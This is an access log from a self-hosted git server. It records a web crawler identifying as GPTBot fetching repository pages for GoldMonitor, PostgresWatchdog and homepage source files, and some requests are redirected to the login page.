"https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:17:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 11795] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:17:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 9791] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:17:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 9790] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:17:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 11849] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:17:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 9779] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:17:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 9791] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:17:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 11791] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:17:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 9789] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:17:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 11795] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:17:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 9790] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:17:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14865] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx" -[17/Feb/2026:17:17:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:17:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:17:17:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:17:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:17:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13979] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx" -[17/Feb/2026:17:17:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:17:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:17:17:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:17:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:17:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx" -[17/Feb/2026:17:17:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:17:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:17:17:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:17:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:17:17:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:17:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:17:17:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:17:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:17:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14254] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx" -[17/Feb/2026:17:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15599] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:17:17:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx" -[17/Feb/2026:17:17:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16523] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx" -[17/Feb/2026:17:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/main.py?display=source" [Client 74.7.227.38] [Length 11561] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/main.py" -[17/Feb/2026:17:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10917] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/main.py" -[17/Feb/2026:17:17:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/main.cpp?display=source" [Client 74.7.227.38] [Length 15764] [Gzip 4.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/main.cpp" -[17/Feb/2026:17:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10917] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py" -[17/Feb/2026:17:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/main.cpp?display=source" [Client 74.7.227.38] [Length 15795] [Gzip 4.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/main.cpp" -[17/Feb/2026:17:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10918] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/main.py" -[17/Feb/2026:17:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10917] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/main.py" -[17/Feb/2026:17:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp?display=source" [Client 74.7.227.38] [Length 15796] [Gzip 4.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp" -[17/Feb/2026:17:17:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild" [Client 74.7.227.38] [Length 99144] [Gzip 18.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build" -[17/Feb/2026:17:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdist" [Client 74.7.227.38] [Length 21042] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist" -[17/Feb/2026:17:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fcodec.hpp" [Client 74.7.227.38] [Length 21407] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:17:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fcodec.hpp" [Client 74.7.227.38] [Length 25650] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:17:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png" -[17/Feb/2026:17:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10895] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10895] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10895] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 14083] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:17:17:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 14053] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:17:17:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 10876] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:17:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 10902] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 